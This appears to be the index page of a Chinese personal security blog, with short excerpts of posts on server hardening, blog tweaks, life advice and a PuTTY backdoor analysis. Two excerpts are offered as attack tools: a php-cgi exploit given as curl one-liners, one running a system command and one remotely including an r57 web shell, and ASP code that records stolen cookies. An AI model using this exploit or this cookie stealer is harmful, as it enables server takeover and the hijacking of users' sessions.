预览模式: 普通 | 列表

[置顶]2011年10月9日,臭袜子's blog正式建成!

php-cgi漏洞利用EXP

1、本地包含直接执行代码:

  1. curl -H "USER-AGENT: <?system('id');die();?>" http://www.chouwazi.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n  

2、远程包含执行代码:

  1. curl http://www.chouwazi.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.chouwazi.com/r57.txt 

查看更多...

Tags: 最新0day 最新漏洞 提权技巧 渗透技巧

所属袜子堆堆:最新0day | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 4次

windows系统和Linux系统下修改TTL值

黑客在测试到服务器操作类型后,可能会针对该操作系统做相应的攻击

  1. Linux系统的TTL值为64,    
  2. Windows NT/2000/XP系统的TTL值为128,    
  3. Windows 98系统的TTL值为32,    
  4. UNIX主机的TTL值为255。  

可以按以下方法修改TTL的默认值,以达到隐藏服务器操作系统类型的目的。

 

Windows下修改TTL

打开注册表编辑器

  1. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters  

查看更多...

Tags: 服务器类 服务器安全 网站安全 网站防御

所属袜子堆堆:网站防御 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 4次

pjblog禁止右键复制的代码

pjblog添加禁止右键的代码,用了段时间,觉得还是删除了比较好。

以前是在很气愤的情况下加入的,但是现在想想也觉得没必要那么的在意吧。

在系统首页文件(default.asp)和日志文件(article.asp)最底下加入如下代码即可。

这两个文件都在根目录下。

  1. <noscript>  
  2. <iframe scr="*.htm"></iframe>  
  3. </noscript>  
  4. <script language="JavaScript">  
  5. document.oncontextmenu=new Function("event.returnValue=false;");  
  6. document.onselectstart=new Function("event.returnValue=false;");  
  7. </script>   

加入后就可以禁止右键复制等功能,但是仅限制于IE内核下的浏览器。

Tags: pjblog pjblog修改记录 pjblog个性修改 pjblog需要修改的地方 博客历程

所属袜子堆堆:博客历程 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 3次

php通用防注入程序

原作者:梦幻剑客

今天做完了整个php项目,想来安全问题不少,开发程序的过程中无心过滤参数。所以注入少不了,才有了下面的防注入程序。

查看更多...

Tags: 防注入 防黑 网站安全 网站防御 防入侵

所属袜子堆堆:网站防御 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 6次

24岁的男人应该注意些什么

看看24岁的男人应该注意些什么?


一:酒吧认识的女人,多半就没有必要再留电话了。


二:喝酒喝好,不代表喝完吐吐完喝,在量上占个老大。


三:不要想着找个情人,因为情人是在有了家有了媳妇有了一定稳定收入的基础上再谈的问题。


五:告别网恋吧,相比之下家人介绍的对象还是可以看看,必竟知根知底比较把握,少走弯路。


查看更多...

Tags: 网络文摘

所属袜子堆堆:网络文摘 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 8次

盗取cookies的代码(asp版、php版、perl版)

盗取cookie的代码

ASP版
  1. <%  
  2. dim strfilename  
  3. strfilename = "mydata.txt" '数据文件存放目录  
  4. set lP=server.createObject("Adodb.Stream")  
  5. lP.Open  
  6. lP.Type=2  
  7. lP.CharSet="gb2312"  
  8. lP.writetext request.Servervariables("QUERY_STRING")  
  9. lP.SaveToFile server.mappath(strfilename),2  
  10. lP.Close  
  11. set lP=nothing  
  12. %>  

 

查看更多...

Tags: 渗透技巧 cookie

所属袜子堆堆:网络技巧 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 4次

中文版Putty后门分析

作者:不走的钟

今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:

一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。

二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。

007安全 和众安全爱好者也参与测试了一个中文版Putty,测试结果如下:

测试网站:http://www.putty.org.cn/

测试时间:2012-1-31日

测试情况:二款软件均有后门

网站首页:

图一:

查看更多...

Tags: 后门 清除后门 查找后门 删除后门 隐藏后门

所属袜子堆堆:后门防御 | 本文链接 | 有: 0人呕吐 | 引用: 0 | 被闻过: 14次